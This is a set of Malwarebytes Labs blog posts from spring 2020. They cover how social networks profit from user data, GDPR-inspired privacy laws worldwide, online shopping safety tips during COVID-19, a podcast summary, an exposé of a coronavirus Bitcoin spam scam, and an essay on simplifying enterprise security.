Malware Bytes

How social media platforms mine personal data for profit

Malware Bytes Security - Fri, 04/03/2020 - 2:42pm

It’s almost impossible not to rely on social networks in some way, whether for personal reasons or business. Sites such as LinkedIn continue to blur the line, increasing the amount of social function over time with features and services resembling less formal sites, such as Facebook. Can anyone imagine not relying on, of all things, Twitter to catch up on breaking coronavirus news around the world instantly? The trade off is your data, and how they profit from it.

Like it or not—and it’s entirely possibly it’s a big slab of “not”—these services are here to stay, and we may be “forced” to keep using them. Some of the privacy concerns that lead people to say, “Just stop using them” are well founded. The reality, however, is not quite so straightforward.

For example, in many remote regions, Facebook or Twitter might be the only free Internet access people have. And with pockets of restriction on free press, social media often represents the only outlet for “truth” for some users. There are some areas where people can receive unlimited Facebook access when they top up their mobiles. If they’re working, they’ll almost always use Facebook Messenger or another social media chat tool to stay in touch rather than drain their SMS allowance.

Many of us can afford to walk away from these services; but just as many of us simply can’t consider it when there’s nothing else to take its place.

Mining for data (money) has never been so profitable.

But how did this come to be? In the early days of Facebook, it was hard to envision the platform being used to spread disinformation, assist in genocide, or sell user data to third-parties. We walk users through the social media business model and show how the inevitable happens: when a product is free, the commodity is you and your data.

Setting up social media shop

Often, Venture Capital backing is how a social network springs into life. This is where VC firms invest lots of money for promising-looking services/technology with the expectation they’ll make big money and gain a return on investment in the form of ownership stakes. When the company is bought out or goes public, it’s massive sacks of cash for everybody. (Well, that’s the dream. The reality is usually quite a bit more complicated).

It’s not exactly common for these high-risk gambles to pay off, and what often happens is the company never quite pops. They underperform, or key staff leave, and they expand a little too rapidly with the knock-on effect that the CEO suddenly has this massive service with millions of users and no sensible way to turn that user base into profit (and no way to retain order on a service rife with chaos).

At that point, they either muddle along, or they look to profit in other ways. That “other way” is almost always via user data. I mean, it’s all there, so why not? Here are just some of the methods social networks deploy to turn bums on seats into massive piles of cash.

Advertising on social media

This is the most obvious one, and a primary driver for online revenue for many a year. Social media platforms tend to benefit in a way other more traditional publishers cannot, and revenue streams appear to be quite healthy in terms of user-revenue generation.

Advertising is a straight-forward way for social media networks to not only make money from the data they’ve collected, but also create chains where external parties potentially dip into the same pool, too.

At its most basic, platforms can offer ad space to advertisers. Unlike traditional publishing, social media ads can be tailored to personalized data the social network sees you searching for, talking about, or liking daily. If you thought hitting “like” (or its equivalent) on a portal was simply a helpful thumbs up in the general direction of someone providing content, think again. It’s quite likely feeding data into the big pot of “These are the ads we should show this person.” 

Not only is everything you punch into the social network (and your browser) up for grabs, but everything your colleagues and associates do too, tying you up in a neat little bow of social media profiling. All of it can then be mined to make associations and estimations, which will also feed back to ad units and, ultimately, profit.

Guesstimates are based on the interests of you, your family, your friends, and your friends’ friends, plus other demographic-specific clues, such as your job title, pictures of your home, travel experiences, cars, and marriage status. Likely all of these data points help the social network neatly estimate your income, another way to figure out which specific adverts to send your way.

After all, if they send you the wrong ads, they lose. If you’re not clicking through and popping a promo page, the advertisers aren’t really winning. All that ad investment is essentially going to waste unless you’re compelled to make use of it in some way.

Even selling your data to advertisers or other marketing firms could be on the table. Depending on terms of service, it’s entirely possible the social platforms you use can anonymise their treasure trove and sell it for top dollar to third parties. Even in cases where the data isn’t sold, simply having it out there is always a bit risky.

There have been many unrelated, non-social media instances where it turned out supposedly anonymous data, wasn’t. There are always people who can come along afterwards and piece it all together, and they don’t have to be Sherlock Holmes to do it. All this before you consider social media sites/platforms with social components aren’t immune to the perils of theft, leakage, and data scraping.

As any cursory glance of a security news source will tell you, there’s an awful lot of rogue advertisers out there to offset the perfectly legitimate ones. Whether by purchase or stumbling upon data leaked online, scammers are happy to take social media data and tie it up in email/phone scams and additional fake promos. At that point, even data generated through theoretically legitimate means is being (mis)used in some way by unscrupulous individuals, which only harms the ad industry further.

Apps and ads

Moving from desktop to mobile is a smart move for social networks, and if they’re able to have you install an app, then so much the better (for them). Depending on the mobile platform, they may be able to glean additional information about sites, apps, services, and preferred functionalities, which wouldn’t necessarily be available if you simply used a mobile web browser.

If you browse for any length of time on a mobile device, you’ll almost certainly be familiar with endless pop-ups and push notifications telling you how much cooler and awesome the app version of site X or Y will be. You may also have experienced the nagging sensation that websites seem to degrade in functionality over time on mobile browsers.

Suddenly, the UI is a little worse. The text is tiny. Somehow, you can no longer find previously overt menu options. Certain types of content no longer display correctly or easily, even when it’s something as basic as a jpeg. Did the “Do you want to view this in the app?” popup reverse the positions of the “Yes” and “No” buttons from the last time you saw it? Are they trying to trick you into clicking the wrong thing? It’s hard to remember, isn’t it?

A cynic would say this is all par for the course, but this is something you’ve almost certainly experienced when trying to do anything in social land on a mobile minus an app.

Once you’re locked into said app, a brave new world appears in terms of intimately-detailed data collection and a huge selection of adverts to choose from. Some of them may lead to sponsored affiliate links, opening the data harvesting net still further, or lead to additional third-party downloads. Some of these may be on official platform stores, while others may sit on unofficial third-party websites with all the implied risk such a thing carries.

Even the setup of how apps work on the website proper can drive revenue. Facebook caught some heat back in 2008 for their $375USD developer fee. Simply having a mass of developers making apps for the platform—whether verified or not—generates data that a social network platform can make use of, then tie it back to their users.

It’s all your data, wheeling around in a tumble drier of analytics.

Payment for access/features

Gating access to websites behind paywalls is not particularly popular for the general public. Therefore, most sites with a social networking component will usually charge only for additional services, and those services might not even be directly related to the social networking bit.

LinkedIn is a great example of this: the social networking part is there for anybody to use because it makes all those hilariously bad road warrior lifestyle posts incredibly sticky, and humorous replies are often the way people first land on a profile proper. However, what you’re paying for is increased core functionality unrelated to the “Is this even real?” comedy posts elsewhere.

In social networking land, a non-payment gated approach was required for certain platforms. Orkut, for example, required a login to access any content. Some of the thinking there was that a gated community could keep the bad things out. In reality, when data theft worms started to spread, it just meant the attacks were contained within the walls and hit the gated communities with full force.

The knock-on effect of this was security researchers’ ability to analyse and tackle these threats was delayed because many of these services were either niche or specific to certain regions only. As a result, finding out about these attacks was often at the mercy of simply being informed by random people that “X was happening over in Y.”

These days, access is much more granular, and it’s up to users to display what they want, with additional content requiring you to be logged in to view.

Counting the cost

Of the three approaches listed above, payment/gating is one of the least popular techniques to encourage a revenue stream. Straight up traditional advertising isn’t as fancy as app/site/service integration, but it’s something pretty much anybody can use, which is handy for devs without the mobile know-how or funds available to help make it happen.

Even so, nothing quite compares to the flexibility provided by mobile apps, integrated advertising, and the potential for additional third-party installs. With the added boost to sticky installs via the pulling power of social media influencers, it’s possibly never been harder to resist clicking install for key demographics.

The most important question, then, turns out to be one of the most common: What are you getting in return for loading an app onto your phone?

It’s always been true for apps generally, and it’ll continue to be a key factor in social media mobile data mining for the foreseeable future. “You are the product” might be a bit long in the tooth at this point, but where social media is concerned, it’s absolutely accurate. How could the billions of people worldwide creating the entirety of the content posted be anything else?

The post How social media platforms mine personal data for profit appeared first on Malwarebytes Labs.

Categories: Malware Bytes

GDPR: An impact around the world

Malware Bytes Security - Wed, 04/01/2020 - 3:19pm

A little more than one month after the European Union enacted the General Data Protection Regulation (GDPR) to extend new data privacy rights to its people, the governor of California signed a separate, sweeping data protection law that borrowed several ideas from GDPR, sparking a torch in a legislative data privacy trend that has now spanned at least 10 countries.

In Chile, lawmakers are updating decades-old legislation to guarantee that their Constitutional data protections include the rights to request, modify, and delete personal data. In Argentina, legislators are updating a set of data privacy protections that already granted the country a “whitelist” status, allowing it to more seamlessly transfer data to the European Union. In Brazil, the president signed a data protection law that comes into effect this August that creates a GDPR-like framework, setting up rules for data “controllers” and “owners,” and installing a data protection authority to regulate and review potential violations.

Beyond South America, India is mulling a new law that would restrict how international companies use personal data, but the law includes a massive loophole for government agencies. Canada passed its first, national data breach notification law, and in the United States, multiple state and federal bills have borrowed liberally from GDPR’s ideas to extend the rights of data access, deletion, and portability to the public.

GDPR came into effect two years ago, and its impact is clear: Data privacy is the law of the land, and many lands look to GDPR for inspiration.

Amy de La Lama, a partner at Baker McKenzie who focuses her legal practice on global privacy, data security, and cybersecurity, said the world is undergoing major shifts in data privacy, and that GDPR helped spur much of the current conversations.

“At a high level, there’s a huge amount of movement in the privacy world,” de La Lama said, “and, without a doubt, the GDPR has been a huge driver.”

The following laws and bills are a sample of the many global efforts to bring data privacy home. Often, the newer laws and legislation are influenced by GDPR, but several countries that passed data privacy laws before GDPR are still working to update their own rules to integrate with the EU.

This is GDPR around the world.

South America

Several countries in South America already grant stronger data protection rights to their public than in the United States, with several enshrining a right to data protection in their constitutions.

In 2018, Chile joined that latter club, supplementing its older, constitutional right to privacy with a new right to data protection. The constitution now says:

“The Constitution ensures to every person: … The respect and protection of private life and the honor of the person and his family, and furthermore, the protection of personal data. The treatment and protection of this data will be put into effect in the form and conditions determined by law.”

That last reference to “conditions determined by law” matters deeply to Chileans’ actual data protection rights because even though the Constitution protects data, it does not specify how that data should be protected.

Think of it like the US Constitution, which, for instance, protects US persons against unreasonable searches. Only within the past few decades, however, have courts and lawmakers interpreted whether “unreasonable searches” include, for instance, searches of emails sent through a third-party provider, or searches of historical GPS data tracked by a mobile phone.

Now, Chile is working to determine what its data protection rights will actually include, with a push to repeal and replace a decades-old data protection law called the “Personal Data Protection Act,” or Act No. 19.628. The latest legislative efforts include a push to include the rights to request, modify, and delete personal data, along with the right to withdraw consent from how a company collects, stores, writes, organizes, extracts, transfers, and transmits personal data.

Revamping older data protections is not unique to Chile.

Argentina implemented its Personal Data Protection Law (PDPL) in 2000. But that law, unlike Chile’s, drew inspiration from the European Union long before the passage of GDPR. Instead, Argentina’s lawmakers aligned their legislation with the law that GDPR repealed and replaced—Data Protection Directive of 1995.

This close relationship between Argentinian and European data protection law made Argentina a near shoe-in for the GDPR’s so-called “whitelist,” a list of countries outside the European Union that have been approved for easier cross-country data transfers because of those countries’ “adequate level of data protection.” This status can prove vital for countless companies that move data all around the world.

According to the European Commission, countries that currently enjoy this status include Andorra, Argentina, Canada (for commercial organizations), the Faroe Islands, Guernsey, Israel, Isle of Man, Japan, Jersey, New Zealand, Switzerland, and Uruguay. The US is also included, so long as data transfers happen under the limited Privacy Shield framework—an agreement that replaced the previous, separate data transfer agreement called “Safe Harbor,” which itself was found invalid by the Court of Justice for the European Union.  

(Privacy Shield also faces challenges of its own, so maybe the US should not get too comfortable with its status.)

Despite Argentina’s current whitelist status with the European Commission, the country is still trying to update its data protection framework with a new piece of legislation.

The new bill, Bill No. MEN-2018-147-APN-PTE, was introduced to Argentina’s Congress in September 2018. Its proposed changes include allowing the processing of sensitive data with approved consent from a person, expanding the territorial reach of personal data protections, creating new rules for when to report data breaches to the country’s data regulator, and drastically increasing the sanctions for violating the law.

Within South America, there is still at least one more country influenced by GDPR.

In August 2018, Brazil’s then-president Michel Temer signed the country’s General Data Privacy Law (“Lei Geral de Proteção de Dados Pessoais” or LGPD). The law comes into effect August 2020.

The similarities to GDPR are many, de La Lama said.

“Like the GDPR, the new law, when it comes into effect, applies extraterritorially, contains notice and consent and cross-border transfer requirements as well as obligations with regard to data subject rights and data protection officer appointment,” de La Lama said. “EU Standard Contractual clauses may be recognized under the new law but this step has not yet been taken.”

The LGPD defines “sensitive data” as personal data that reveals racial or ethnic origin, political opinions, religious or philosophical beliefs, and trade union membership, along with genetic data, biometric data used for uniquely identifying a natural person, health and medical information, and data concerns a person’s sex life or sexual orientation.

Similar to GDPR, Brazil’s LGPD also creates a distinction between data controllers or owners, and data processors, a framework that has quickly rolled out in proposed laws around the world, including the United States. Brazil’s LGPD also applies beyond the country’s borders. The law applies to companies and organizations that offer goods or services to those living within Brazil, much like how GDPR applies to companies that direct marketing towards those living inside the European Union.

The law also, following amendments, includes the creation of the Brazilian Data Protection Authority. That body will have the sole authority to issue regulations and sanctions for organizations that violate the law because of a data breach.  


In late 2019, India’s lawmakers introduced a data protection law two years in the making, which included minor similarities to the EU’s GDPR. The Personal Data Protection Bill of 2019, or PDPB, would require international companies to seek the consent of India’s public for many uses of personal data, and grant the people a new right to have their data erased.

The similarities stop there.

While portions of the law feint the main purpose of GDPR, the data protections actually included suffer from an enormous loophole. As written, though the law’s data restrictions apply to government agencies, the law also allows the newly-created data protection authority to pick any government agency that it wants exempted.

The law would permit New Delhi to “exempt any agency of government from application of Act in the interest of sovereignty and integrity of India, the security of the state, friendly relations with foreign states, public order,” according to an early, leak draft of the law obtained by TechCrunch.

This exceptionally broad language is akin to any loophole in the United States that applies to “national security,” and it is one that digital rights activists in India are fighting.

“This is particularly concerning in India given that the government is the largest collector of data,” said Apar Gupta, executive director of the Internet Freedom Foundation, in talking to the New York Times.

Salman Waris, who leads the technology practice at the New Delhi law firm TechLegis, also told the New York Times that the new Indian law purports to protect the public while actually accomplishing something else.

“It gives a semblance of owning your data, and having the right to know how it is used, to the individual,” Waris said, “but at the same time it provides carte blanche to the government.”

GDPR in the United States

Though we’ve focused on GDPR’s impact on a global scale, it is impossible to deny the influence felt at home in the United States.

While Congress’s efforts to pass a comprehensive data privacy law date back to the Cambridge Analytica scandal of 2018, some of the ideas embedded in more current data privacy legislation relate directly to GDPR.

One clear example is the California Consumer Privacy Act (CCPA), said Sarah Bruno, partner at Reed Smith who works at the intersection of intellectual property, privacy, and advertising. Though the law was signed less than one month after GDPR took effect in the EU, it was drafted with more than enough time to borrow from GDPR after that law’s earlier approval, in 2016.

“GDPR did have an impact on CCPA,” Bruno said, “and it has a lot of components in CCPA.”

CCPA grants Californians the rights to access and delete data, the right to take their data and port it to a separate provider, along with the right to know what data about them is being collected. Californians also enjoy the explicit right to opt out of having their data sold, which is not verbatim included in GDPR, though that law does give residents protections that could result in a similar outcome. And though CCPA does not grant rights to “data subjects,” as written in GDPR, it does have a similar scope of effect. Much of the law is about giving consumers access to their own information.

“Consumers are able to write to a company, similar to GDPR, to find out what information [the company] is collecting on them, via cookies, about their purchase history, what they’re looking at on websites when on there,” Bruno said. She added that CCPA contends that “all that information, a California consumer should have access to that, and that’s new in the US, but similar to GDPR.”

But California is just one state inspired by GDPR. There’s also Washington, which, earlier this year, introduced a remodeled version of its Data Privacy Act.

“It’s similar as well to CCPA,” Bruno said about Washington’s revamped bill. “As I call it, CCPA plus.”

The Data Privacy Act scores close to GDPR, in that it borrows some of the EU law’s language on data “controllers” and “processors,” which would both receive new restrictions on how personal data is collected and shared. The law, much like GDPR, would also provide Washingtonians with the rights to access, control, delete, and port their data. Much like CCPA, the Data Privacy Act would also let residents specifically opt out of data sales.

Though the bill initially drew a warm welcome from Microsoft and the Future of Privacy Forum, shortly after, Electronic Frontier Foundation opposed the legislation, calling it a “weak, token effort at reining in corporations’ rampant misuse of personal data.”

The bill, introduced on January 13 this year, has not moved forward.

GDPR’s legacy: Fines or fatigue?

GDPR’s passage came with a clear warning sign to potential violators—break the law and face fines of up to 2 percent of global revenue. For an Internet conglomerate like Alphabet, which owns Google, such an enforcement action would mean paying more than a billion dollars. The same is true for Apple, Facebook, Amazon, Verizon, and AT&T, just to name a few.

Despite having the tools to hand down billion-dollar penalties, authorities across Europe were initially shy to use them. In early January 2019, France’s National Data Protection Commission (CNIL) slapped a €50 million penalty against Google after investigators found a “lack of transparency, inadequate information and lack of valid consent regarding the ads personalization.” It was the largest penalty at the time, but it paled in comparison to what GDPR allowed: Based on Alphabet’s 2018 revenue, it could have received a fine of about €2.47 billion, or $2.72 billion in today’s dollars.

Six months later, regulators leaned more heavily into their powers. In July 2019, the Information Commissioner for the United Kingdom (which was at the time still a member of the European Union) fined British Airways $230 million because of an earlier data breach that affected 500,000 customers. The penalty represented 1.5 percent of the airline’s 2018 revenue.

But regulatory fines tell just one side of GDPR’s story, because, as de La Lama said, after the law’s passage, her clients tell her of fatigue in trying to comply with every new law.

The nuances between each country’s data protection laws have produced guide after guide from multiple, global law firms, each attacking the topic with their own enormous tome of information. De la Lama’s own law firm, Baker McKenzie, released its annual, global data protection guide last year, clocking in at 886 pages. A quick glance reveals the subtle but important differences between the world’s laws: Countries that adopt a framework that separates data restrictions between “controllers” and “processors,” countries that protect “consumers” versus “data subjects,” countries that require data breaches to be reported to data protection authorities, countries that create data protection authorities, and countries that differ on just what the hell personal information includes.

Complying with one data protection law can be hard enough, de La Lama said, and there’s little assurances that the current data privacy movement is coming to a close.

“There’s difficulty in trying to bring a company into compliance with a wide variety of privacy and technical specifications and finding internal resources to do that is a daunting task,” de la Lama said. “And when you’re trying to replicate that across multiple jurisdictions, we’re seeing a lot of companies just trying to wrap their arms around how to do that, knowing that GDPR isn’t the end game, but really just the start.”

The post GDPR: An impact around the world appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Important tips for safe online shopping post COVID-19

Malware Bytes Security - Tue, 03/31/2020 - 2:57pm

As more and more countries order their citizens inside in response to COVID-19, online shopping—already a widespread practice—has surged in popularity, especially for practical items like hand sanitizer, groceries, and cleaning products. When people don’t feel safe outside, it’s only natural they’d prefer to shop as much as possible from the safety of their own homes. Unfortunately, you can bet your last toilet paper roll that cybercriminals anticipated the rush and were ready to take advantage of our need to buy supplies of all kinds online.

Because we know how cybercriminals think and have already seen an uptick in web skimmers and coronavirus scams, we wanted to prepare our readers for a safer online shopping experience. We have rounded up some tips for staying secure, as well as some landmines to avoid during your online shopping spree.

Dangers to avoid while shopping online

There are a few dangers that always lurk for online shoppers, and some of them increase in severity during particular events, such as holidays or summer travel season, known shopping periods like Cyber Monday or Singles’ Day, or tragic incidents, including natural disasters and the current global pandemic. Here are a few red flags to watch out for:

Raised prices

It’s only natural to expect a small raise in prices as some companies cope with economic fallout from closing brick-and-mortar shops and lack of personnel. Combine that with an increase in demand for specific items, plus the increased cost of delivery to compensate for added danger, and the totals at checkout are probably creeping up all over the place. But it’s one thing to raise prices responsibly. It’s quite another to price gouge, and cybercriminals and scammers are opting for the latter to profit from misfortune.

During times like these, it’s easy to click “purchase” on the first webpage peddling scarce or highly sought-after commodities. For example, two brothers tried to make a fortune selling hand sanitizer for $70 per bottle. People were desperate enough to buy before the attorney general shut down the site. But don’t fall for the hype. Take a deep breath and research an item before jumping at the first opportunity to purchase.

Pro tip: If a price seems wildly out of line, open up a new tab on your browser and search the item name and pricing. You can also check sites such as Tom’s Guide or Consumer Reports for fair prices.

Delays in delivery time

If items are scarce, there may be a long waiting time before delivery. Know your rights in case a supplier can’t deliver within the agreed time frame, and don’t fall for scammers promising they can help you cut the line. Usually, you can claim a refund if the article doesn’t arrive by the date you were promised. But a scammer couldn’t care less about your claims for a refund. They will make sure they are nowhere to be found when the claims come in and the going gets rough.

Pro tip: Search a website’s customer service page to find out delivery and return policies before purchasing, especially items in short storage. Typically, these policies are found on shipping, support, help, or FAQ webpages.

Counterfeit goods

Selling counterfeit goods is another common type of web crime that will likely see an uptick during the coronavirus pandemic. From a photograph it is nearly impossible to tell whether an item is faux or the real deal. For all we know, the scammer could put a picture of the original on their site and ship you a cheap replica—or nothing at all. A good rule of thumb is: If it’s too good to be true, it usually isn’t.

Pro tip: Check the reviews of the seller, reseller, and product—not just on the site, but in a separate search. If someone has been duped before, chances are, they’ll post pictures or a review.

Web skimmers

Ever since shelter-in-place orders have sent millions of shoppers online, the Malwarebytes threat intelligence team has noticed an uptick in the amount of digital credit card skimmers, also known as web skimmers. Web skimmers are placed on shopping cart pages and collect the payment data that customers enter when they purchase an item online.

Cybercriminals can hack the websites of legitimate brands to insert web skimmers, so avoiding resellers or little-known boutiques won’t protect shoppers from web skimmers. Instead, consider using an antivirus with web protection or browser extensions that block malicious content.

Jérôme Segura, Malwarebytes Director of Threat Intelligence is an internationally renowned expert on web skimmers. He was kind enough to share some of his knowledge with us:

“The vast majority of people, including those familiar with computers, would not be able to see that an online merchant has been hacked and that a skimmer is going to harvest their information.

But there are certain things you can do to minimize risks. For example, check that the site looks up to date by looking at things such as copyright information. If it says something like Copyright 2015, this may be an indication that the site owner is not paying attention to details.

I also believe it’s essential to use some kind of web protection. Based on our telemetry, we stop hundreds of attempts to steal credit card data on a daily basis by blocking malicious domains and IP addresses associated with web skimming infrastructure.”

Pro tip: Keep an eye on your bank account for unexpected payments, and know what to do when your information has been stolen.

Recommended reading: How to protect your data from Magecart and other e-commerce attacks

Precautions and possible pitfalls

While not outright dangers, there are a few somewhat shady behaviors that could signal further trouble down the road. Here are a few you might want to avoid or take into account when you consider online shopping.

Security certificates

A significant surge in the number of requested security certificates indicates that more fraudulent websites are being created. As we have mentioned before on the blog, the green padlock alone does not guarantee a safe site. Free or cheap security certificates are an indication that the site might be fraudulent or built without any attention to real security.

Use trusted sites and visit them directly, not through a search. Using legitimate sites with a good reputation does have obvious advantages. You know it’s a real shop and they deliver on what they promise.

Pro tip: Bookmark favorite URLs to save on manually typing. By saving the URL rather than searching for a shop name, you are less likely to be fooled by impersonators.

Targeted ads

Targeted advertising should not be rewarded. Usually it’s better to ignore it. Pretty much for the same reasons as above. Visit the site directly instead of clicking a link in your Facebook feed. Since many shops use cookies for targeted advertising, they will soon pick up that you are looking for a certain item and try to lure you to site by offering it to you in your timeline.

Pro tip: Consider purchasing insurance for high-value products. With insurance, you can at least get your money back if your purchase never arrives or is damaged or otherwise below expectations. Insurance does not have to be expensive. PayPal and many credit cards offer this service free of charge.

Information overload

Be wary of web shops asking you for information they don’t need to service you. They might be up to no good. And even if they are not, they have no right asking you for details that are unnecessary for the shopping and delivery process. Even if they do not plan to sell your data to third parties, they may experience a breach and spill your personal information anyway.

Pro tip: Only fill in required sections of any data forms for an online purchase. And if a form starts asking for social security numbers, pet’s names, or other weirdly personal information, do not enter the content and back out of the purchase.

Recommended reading: 10 tips for safe online shopping on Cyber Monday

Preventative measures

As always, it’s important to take the normal security precautions while shopping online. These include the following:

  • Use up-to-date software, especially your operating system and your browser. Check that both are updated before you venture online.
  • Disregard overly aggressive pop-ups, push notifications, and other annoying cries for attention. Usually, unsolicited advice in the form of persistent advertisements, browser extension downloads, coupon programs, and other assorted spam are aiming for trickery and not actually trying to help.
  • Pay extra attention when using public Wi-Fi, and avoid making payments while you are on unprotected Wi-Fi.
  • Where possible, use a VPN during online shopping. A good VPN will encrypt the traffic between you and the online shop, so nobody can spy on it.

Stay safe, everyone!

The post Important tips for safe online shopping post COVID-19 appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Lock and Code S1Ep3: Dishing on data privacy with Adam Kujawa

Malware Bytes Security - Mon, 03/30/2020 - 12:33pm

This week on Lock and Code, we discuss the top security headlines generated right here on Labs and around the Internet. In addition, we talk to Adam Kujawa, a director of Malwarebytes Labs, about the state of data privacy today, including how users and businesses can protect sensitive information when there are few laws to help them out, and whether we could foresee the many problems with today’s rampant data sharing when we first built the Internet.

Tune in for all this and more on the latest episode of Lock and Code, with host David Ruiz.

You can also find us on the Apple iTunes store, on Google Play Music, plus whatever preferred podcast platform you use.

We cover our own research: Plus other cybersecurity news:
  • Housing association spills data: A “please update your details” missive has horrible data exposure consequences for a UK-based organization. (Source: The Register)
  • The age-old problem of password reuse: Shockingly, it’s a problem for Fortune 500 companies, too. (Source: Help Net Security)
  • Homework equals router mayhem: With many worldwide retreating to their home environment, it figures that hackers would follow them there. (Source: Cyberscoop)
  • Compromised news sites lead to malware: A variety of backdoor files are offered up by hijacked news portals. (Source: Bleeping Computer)
  • Netflix and phish: The increase in work-from-home employees is also giving rise to a bump in attacks on streaming services. (Source: RapidTV News)

Stay safe, everyone!

The post Lock and Code S1Ep3: Dishing on data privacy with Adam Kujawa appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Coronavirus Bitcoin scam promises “millions” working from home

Malware Bytes Security - Thu, 03/26/2020 - 1:05pm

In the last week, we’ve seen multiple coronavirus scams pushed by bad actors, including RAT attacks via fake health advisories, bogus e-books working in tandem with Trojans, and lots of other phishing shenanigans. Now we have another one to add to the ever-growing list: dubious coronavirus Bitcoin missives landing in your inbox.

Reworking a classic spam tactic

This is a retooling of an older spam run involving British comedian Jim Davidson, the older form of which was seen bouncing around in November 2019. As they put it, “Jim Davidson bounced back from bankruptcy with Bitcoin.” Even before that, in the first half of 2019, he was being used alongside other well-known British celebrities such as Jamie Oliver and daytime TV presenters to promote a variety of misleading Bitcoin get-rich schemes. This is common for Bitcoin scams, and you can dip into any year you like and find a few of these floating around at any given time.

What do we have this time?

In short, these coronavirus Bitcoin scams are older attempts to have people part with their cash hastily retooled to make hay with the current global pandemic. It’s incredibly lazy—the landing pages and follow on websites seem to be untouched from whenever they first appeared. The only new ingredient is the email content mentioning coronavirus, but sadly, that’s often more than enough to have people part with their money.

Click to enlarge

It begins with a non-stop drip-feed of emails, from many different addresses pumping out spam. In the above mailbox, it’s a total of 11 in six days. All of the email addresses are rather optimistically called “coronavirus positives”, letting you know that staying at home thanks to a global pandemic can actually make you rich beyond your wildest dreams.

Some of the subject lines read as follows:

Staying at home because of COVID-19!! Spend your time making thousands on Bitcoins. 

The positive impact of staying home (Corona-virus), Make thousand a day trading Bitcoin.

Join 1000s of Brits making 1000s a day. Bitcoin is back – and this time you can make a million.

Without a larger sample selection to go from, we can’t say which missive is the most popular subject line, but the one mentioning “work from home” is at least the most popular in this particular mailbox and a few others that we’ve seen. 

Coronavirus Bitcoin email style

The emails are formatted in much the same way, emulating the British newspaper “red top” style—most specifically, The Sun.

Here’s the text from one of the samples we looked at:

Click to enlarge

Click to enlarge

The text reads as follows:

Jim Davidson Reveals How He Bounced Back After The Bankruptcy – He claims anyone can do it & shows ‘Good Morning Britain’ How!

Appearing on ‘Good Morning Britain’ show, Jim Davidson, a man who has recovered from Bankruptcy thanks to an automated Bitcoin trading platform, called BTC Profit . The idea was simple: allow the average person the opportunity to cash in on the Bitcoin boom. Even if they have absolutely no investing or technology experience.

A user would simply make an initial deposit into the platform, usually of £200 (or $250, as the platform works with USD) or more, and the automated trading algorithm would go to work. Using a combination of data and machine learning, the algorithm would know the perfect time to buy Bitcoin low and sell high, maximising the user’s profit.

To demonstrate the power of the platform Jim had Kate Garraway deposited £200 on the live show.

Here’s one that emulates The Sun to a high degree, complete with almost-but-not-quite name using the same font as the well-known newspaper:

Click to enlarge

In the above mail, a student reveals how “he earns more than £40,000 every month working from home.” Some of the links are now seemingly broken, and a few redirect to Google or random shopping sites such as the below if you presumably visit from a region they’re not interested in:

Click to enlarge

Not all of the links are broken, however. A few will indeed lead you to the supposed Bitcoin promised land.

Getting rich quick?

What you’ll see on a live page is essentially a rehash of the information in the email, complete with a few more familiar faces from UK daytime television. At this point, the coronavirus hook has been entirely abandoned:

Click to enlarge

Click to enlarge

After a lot of urging the visitor to sign up to some sort of wonderful Bitcoin system, clicking the links will finally take them to the end game:

Click to enlarge

It’s a landing page promoting something called “Bitcoin Revolution.” This has been around for a while, usually in relation to dubious ads featuring the previously mentioned celebrities.

Access is given to a trading platform, a fair amount of money is deposited into it over time, an “investment manager” asks you to deposit their commission into a bank account so they can release your funds, and…oh dear. This is the part where people report the funds never arrive and now they’re massively out of pocket.

Profiting from chaos

Endlessly spamming these “get rich quick” emails to people in normal circumstances is bad enough, but jumping on the coronavirus bandwagon to claim people can make a fortune from working from home is dreadful. This is absolutely the worst time to end up losing a significant amount of savings—they may prove to be absolutely essential further down the line.

If you receive one of these mails and they’re not automatically placed into your spam folder, report, delete, and move on. We have a feeling you won’t be making your millions from this one.

The post Coronavirus Bitcoin scam promises “millions” working from home appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Consumerization: a better way to answer cybersecurity challenges

Malware Bytes Security - Wed, 03/25/2020 - 12:00pm

A version of this article originally appeared in Forbes on February 12, 2020.

Consumerization: The specific impact that consumer-originated technologies can have on enterprises. 


More and more, enterprises are coming to understand that they need to adopt the agile processes and product strategies of startups in order to compete in today’s markets. But there is a parallel problem in enterprise security that is not being addressed. Simply tweaking your internal processes won’t solve this problem: A different approach is needed.

We read the stories every day. The number and severity of cyberattacks keep growing. More and more businesses are being breached more and more often—and it’s happening in schools, hospitals and clinics, and major cities, too.

For example, in December 2019, the city of New Orleans told employees to “power down computers, unplug devices, and disconnect from Wi-Fi” after a cyberattack struck its computers. Although 911 emergency services were not affected, the police department had to shut down its entire IT network.

Increasingly, we see governments, organizations, and enterprises struggling to keep up with cyberattacks. And, disturbingly, they are increasingly failing to stop them.

The fact is, agile processes and improved efficiency won’t solve the growing security problem. Nor will throwing more personnel at it. That’s what organizations are attempting now, and it’s not working. Businesses are falling behind the attackers. Something has to change.

What is needed is a new way of thinking about security.

When you get millions of alerts, and you respond by looking for more trained technicians to troubleshoot the alerts, you’re pursuing a faulty strategy. For one, you won’t find the talent. For another, the strategy doesn’t scale. As you add security tools and staff, you multiply the complexity of your security operation. What you need is to reduce the complexity.

It’s helpful to step back and ask, “What would a desirable, effective security solution look like?” I suggest that it should be as intuitive as using an iPhone app.

“Hold on,” you say. “The IT market is not like the consumer market. There are different problems to solve, unique expectations to meet, and technical skillsets required to operate.” And that’s all true. But that’s just a description of the challenges inherent with the old model of security thinking.

Consider the security and privacy challenges in the consumer space. Consumer products have to be easy to use, or they won’t sell—particularly for a problem that is mostly invisible to the consumer (until it bites them). Security tools need to be easy enough for consumers to use, yet powerful enough to give them ownership of their privacy and security. That’s hard to achieve, but consumer software development is all about empowering users without overwhelming them with complexity.

And that has to be the goal in the enterprise as well. It should be just as easy for a company to protect itself and have a strong cybersecurity posture as it is for a consumer to use an app. Organizations should strive for top protection using fewer staff members that require specialized training. That should be the target of enterprise security solutions.

We call this goal the democratization, or consumerization, of cybersecurity. It’s the right goal in today’s market. It’s also quite difficult. To write robust cybersecurity products that provide organizations with comprehensive coverage and are as simple to use as consumer technology is so difficult that no one has been up to the task.

It’s easy to generate a new security tool that handles lots and lots of alerts. But making it prioritize threats so that you only address real dangers while simplifying user interface so that it doesn’t require extensive training—that’s the hard part. And that’s what we’re talking about when we refer to the consumerization of IT security.

It reminds me of the famous saying by French mathematician Blaise Pascal, which is often attributed to Mark Twain: “I would have written a shorter letter, but I did not have the time.” Simple is hard.

